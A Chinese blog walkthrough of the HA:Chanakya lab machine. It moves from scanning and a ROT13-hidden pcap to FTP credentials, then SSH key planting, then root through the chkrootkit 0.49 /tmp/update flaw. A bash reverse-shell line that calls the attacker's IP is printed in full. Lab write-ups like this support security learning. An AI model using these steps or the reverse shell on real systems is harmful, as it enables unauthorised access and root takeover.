HA:chanakya靶机渗透

最新推荐文章于 2024-08-24 17:09:16 发布
最新推荐文章于 2024-08-24 17:09:16 发布
阅读量296 收藏
点赞数
文章标签: linux python java ubuntu centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44911239/article/details/119890515
版权

HA:chanakya靶机渗透

1. 环境和信息

1.1 靶机下载地址

1.2 环境

  • 攻击环境:kali linux IP地址:192.168.0.21
  • 靶机环境:linux IP地址:待扫描

1.3 信息

摧毁王国的策划者又回来了,这次他创造了一个难题,会让你挠头!是时候面对Chanakya。
您是否能够解决此“从根开始”并证明自己更明智?
枚举是关键!!!!

2. 渗透过程

2.1 信息收集

  • 脚本化扫描 【只是简单的将 IP发现、端口扫描、nikto扫描、whatweb 生成一个报表】
  • image-20200519213259360
  • 扫描结束,我们可以获得靶机IP地址为: 192.168.0.107
  • 扫描结果在 Auto-Scan/192.168.0.107.html
  • 打开看看:
  • image-20200519213632003
  • 可以看到开启的服务有 (21)ftp (22)ssh 和80(http)
  • nikto扫描的web并没有可用的信息,whatweb也没扫描出任何web框架
  • 简单浏览一下网页
  • image-20200519214049252
  • 也没看到啥玩意啊
  • 开始尝试目录爆破
  • image-20200519215514033
  • 得到关键文件:abuse.txt
  • 打开内容是:nfubxn.cpncat 不管先保存一下

2.2 开始渗透

  • 我们先尝试登陆ftp看看

  • image-20200519215923243

  • 需要用户名密码,试试这个nfubxn.cpncat

  • 登不上去,难道是加密了,还是另藏玄机

  • 如果是加密很可能是凯撒密码,就是每个字母都会偏移某个特定的值

  • 但是 像 “ . “ 这种字符是不会被加密的而且只支持26个字母

  • 到网上解密一下

  • image-20200519221021938

  • 可以用脚本把 1-25 的全部结果都拿出来看看

  • 我这里直接公布答案了

  • image-20200519221229352

  • 当key=13时,密文就变成了ashoka.pcapng

  • 用过Wireshark 的都知道 pcapng是新版本数据包的后缀名,刚好有点在前面,这就好像是一个文件

  • 我们试着访问 http://192.168.0.107/ashoka.pcapng

  • 能下载~看来是要我们分析流量

  • 可以看到有FTP协议的流量,我们追踪流

  • image-20200519221857035

  • 可以看到登录时输入的账号和密码还有一些操作

  • FTP账号密码:ashoka : kautilya

  • image-20200519222454291

  • 登录之后是在ashoka的用户目录下, 也没看到什么有价值的文件

  • 反正他有ssh服务,我们尝试使用公钥达到免密码登录

  • 先到kaii机器生成自己的密钥对

  • image-20200519222912589

  • ~/.ssh 文件夹里面的 .pub文件 复制成一份名叫 authorized_keys的文件

  • 随便用什么连接一下FTP然后把这个文件传到FTP下的.ssh/authorized_keys

  • 就可以免密码登录了

  • image-20200519224818556

  • 登录之后就可以想办法提权了

  • 我们直接找suid的文件

    find / -perm -u=s -type f 2>/dev/null
    find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null # 查找777的文件

  • image-20200519225239807

  • 没有找到可利用的

    uname -a 
    Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
    cat /etc/*release 
    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=18.04
    DISTRIB_CODENAME=bionic
    DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"
    NAME="Ubuntu"
    VERSION="18.04 LTS (Bionic Beaver)"
    ID=ubuntu
    ID_LIKE=debian
    PRETTY_NAME="Ubuntu 18.04 LTS"
    VERSION_ID="18.04"
    HOME_URL="https://www.ubuntu.com/"
    SUPPORT_URL="https://help.ubuntu.com/"
    BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
    PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
    VERSION_CODENAME=bionic
    UBUNTU_CODENAME=bionic
    history  	#无
    crontab -l  #无
    sudo -l 	#没密码
    ls -al /tmp #找到一个logs文件
    logs

  • 打开看了一下,随便找了一条百度了一下

  • 说是 linux系统入侵检测工具chkrootkit 的日志文件

    find / -name chkrootkit  2>/dev/null #查找chkrootkit文件的位置
    /usr/local/share/chkrootkit
    /usr/local/share/chkrootkit/chkrootkit
    cd /usr/local/share/chkrootkit  #切换进chkrootkit目录
    ./chkrootkit --help 		#说是-V查看版本
    ./chkrootkit -V
    chkrootkit version 0.49

  • kali 里面再搜下chkrootkit的漏洞

  • image-20200519230813298

  • 刚好版本相同

  • 这里用的是33899.txt

    The line ‘file_port=$file_port $i’ will execute all files specified in
    $SLAPPER_FILES as the user chkrootkit is running (usually root), if
    $file_port is empty, because of missing quotation marks around the
    variable assignment.

    Steps to reproduce:

    • Put an executable file named ‘update’ with non-root owner in /tmp (not
      mounted noexec, obviously)
    • Run chkrootkit (as uid 0)

    Result: The file /tmp/update will be executed as root, thus effectively
    rooting your box, if malicious content is placed inside the file.

    If an attacker knows you are periodically running chkrootkit (like in
    cron.daily) and has write access to /tmp (not mounted noexec), he may
    easily take advantage of this.

    Suggested fix: Put quotation marks around the assignment.

    file_port=”$file_port $i”

    I will also try to contact upstream, although the latest version of
    chkrootkit dates back to 2009 - will have to see, if I reach a dev there

  • 大概意思就是说chkrootkit 一般会设置成计划运行,在运行时会调用/tmp/update文件

  • 然后我就写了一个反弹shell的文件,保存在/tmp/update

    #!/bin/bash
    bash -i >& /dev/tcp/192.168.0.21/8888 0>&1

  • kali 用nc监听一下8888端口,等一会就会反弹一个shell了

  • image-20200519233832895

  • 看了下计划任务

  • image-20200519233832895

  • 一分钟就会执行一次chkrootkit

  • 到这里就结束了

3. 重要信息

3.1 FTP账号密码

ashoka : kautilya

Rex_Surprise
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
chanakya_towersiege_评论
02-28
"chanakya_towersiege_评论"这个标题可能指的是一个基于JavaScript的项目或应用,可能是游戏、网页或者某种交互式体验,其中"chanakya_towersiege"可能是项目或应用的名称,而"评论"则暗示了用户反馈或评价的存在。...
VulnHub-HA_Chanakya
blue_fantasy的博客
01-11 630
Text. HackTheNmae:HA Chanakya The Mastermind that took down kingdoms is back and this time he has created a puzzle that would make you scratch you brains! It’s time to face Chanakya. Will you be able to solve this Boot to Root and prove that you are wiser
Chanakya:完全从零开始使用C ++构建的可扩展,可定制且简单的聊天机器人。 您可以完全选择聊天机器人的专业领域。 现在,有了插件!
02-05
** Chanakya 聊天机器人项目概述 ** Chanakya 是一个由 C++ 开发的聊天机器人项目,它的设计目标是提供一个可扩展、可定制且简单的平台,让用户能够根据自己的需求定制聊天机器人的专业领域。这个项目特别强调了...
image_classifier_template
02-10
感谢FastAI团队,Naveen Chanakya和Flutter团队。 我将一些不同的教程集成在一起,形成了一个SaaS管道模板。 这是Siraj Raval在YouTube上制作视频的代码,用于构建图像分类启动程序。 这里有3个组成部分; Web API,...
itpub.net]summit2
12-19
'11368 Chanakya', 'New Delhi', NULL, 'India', NULL, 'GOOD', 14, 4, NULL); INSERT INTO s_customer VALUES ( 204, 'Womansport', '1-206-104-0103', '281 King Street', 'Seattle', 'Washington', 'USA', ...
多进程和多线程基础概念LINUX
2301_79109608的博客
08-22 930
直接访问物理地址,会导致地址空间没有隔离,很容易导致数据被修改通过虚拟地址空间可以实现每个进程空间都是独立的,操作系统会映射到不用的物理地址区间,在访问时互不干扰.进程状态分为三个基本状态,即运行态,就绪态,阻塞态。在五态模型中,进程分为新建态、终止态,运行态,就绪态,阻塞态。并发:有限的 cpu 核芯的情况下 ,利用快速交替(时间片轮转)执行来达到宏观上的同时执行。虚拟地址 : 虚拟地址并不代表真实的内存空间,而是一个用于寻址的编号。并行:在 cpu 多核的支持下,实现物理上的同时执行。
虚拟内存和linux(操作系统part1)
linjixia的博客
08-24 433
八股之虚拟内存和Linux部分的笔记。
Linux 线程的控制 互斥与同步
qq_63145217的博客
08-23 815
include //头文件sem_t sem;信号量的类型 信号量的变量。
Linux自旋锁和读写锁
m0_74830524的博客
08-24 350
在前面的文章中我们已经介绍了有关互斥锁的概念与使用,本篇将开始介绍在 Linux 中的自旋锁和读写锁。这三种锁分别用于在不同的应用场景之中,其中互斥锁最为常用,但是我们需要了解一下其他的锁。 对于自旋锁和读写锁都介绍了其原理以及接口使用,并且给出了样例代码。
Linux上构建Windows应用程序:深入探索跨平台开发的实践与挑战
w651428055的博客
08-21 1075
Linux上构建Windows应用程序,不仅拓宽了开发者的技能范围,也为软件产品的多平台部署提供了灵活性和成本效益。虽然这一过程面临挑战,但通过合理选择工具、框架和策略,可以有效地克服这些障碍。随着技术的不断进步,跨平台开发将变得更加成熟和便捷,为软件开发带来更多的可能性和机遇。未来,随着更多高效工具和框架的出现,跨平台开发的效率和质量有望进一步提升,为软件工程领域注入新的活力。
Linux中信号量相关接口及环形队列
2301_77479435的博客
08-22 309
Linux中信号量相关接口及环形队列
Linux 实用运维sh脚本分享
08-22 241
【代码】Linux 实用运维sh脚本分享。
linux被植入木马排查思路
qq_59634082的博客
08-20 909
1、查看一定时间内文件的情况 find / -name "*" -type f -newermt '2022-08-25 00:00:00'!2、查看tomcat、nginx的比较大的.jsp .htm文件 find /目录 -name .jsp -o -size +10000k。在相应的文件里把tomcat2用户添加的内容删除 /etc/shadow /etc/group ,异常用户直接锁定。3、查看passwd的修改时间,判断是否在不知情的情况下被添加用户 ls -l /etc/passwd。
Linux 进程 | 进程优先级&进程的环境变量
TTKunn的博客
08-23 1144
本文主要内容为进程的优先级和进程的环境变量,其中含有查看进程、优先级概念、环境变量概念等详细内容
linux查询目录文件基础操作
qq_43826626的博客
08-22 256
ls -l。
Linuxctags——R的使用
m0_71703182的博客
08-23 306
按下。
Docker镜像添加Linux普通用户
lukabruce的博客
08-22 158
2) useradd normalUserName //新增普通用户名,比如新增tom: useradd tom;1) docker run -it --name X1 ;1)基于客户端打客户端镜像包client.tar.gz。3)id -u tom //查看用户tom的UID。4)docker commit X1 镜像B。2) 构建镜像C build-imageC.sh。(3)构建带有普通用户名UID的镜像C。1) 创建DockerFile。
linux发邮件的操作流程和注意事项有哪些?
danplus的博客
08-23 352
掌握Linux发邮件的操作流程和注意事项,可以帮助你在Linux系统中高效、安全地发送邮件。AokSend:集成API与SMTP,Linux下一键高效发邮件,稳定可靠,营销自动化首选!
Linux性能调优指南(1):聚焦CPU性能与缓存优化策略
weixin_73298423的博客
08-20 1219
一, CPU性能调优 。 1.选择适合的CPU · 1.1 性能评估工具 ·1.2 CPU信息查看命令 · 1.3基准测试工具 2.CPU缓存优化 · 2.1.了解缓存结构 ·2.2. 缓存预热 ·2.3.数据布局和访问模式优化 ·2.4.使用性能分析工具· 2.4.1. perf的安装 ·2.4.2. perf的基本使用 ·2.4.3. perf的高级功能 ·2.4.4.perf的工作原理 ·2.5.调整内核参数 · 2.6. 编译器优化 ·2.7.代码优化 ·2.8.多线程与并发控制
linux上datax 安装以及使用
最新发布
寂夜了无痕的博客
08-24 675
linux上datax 安装以及使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值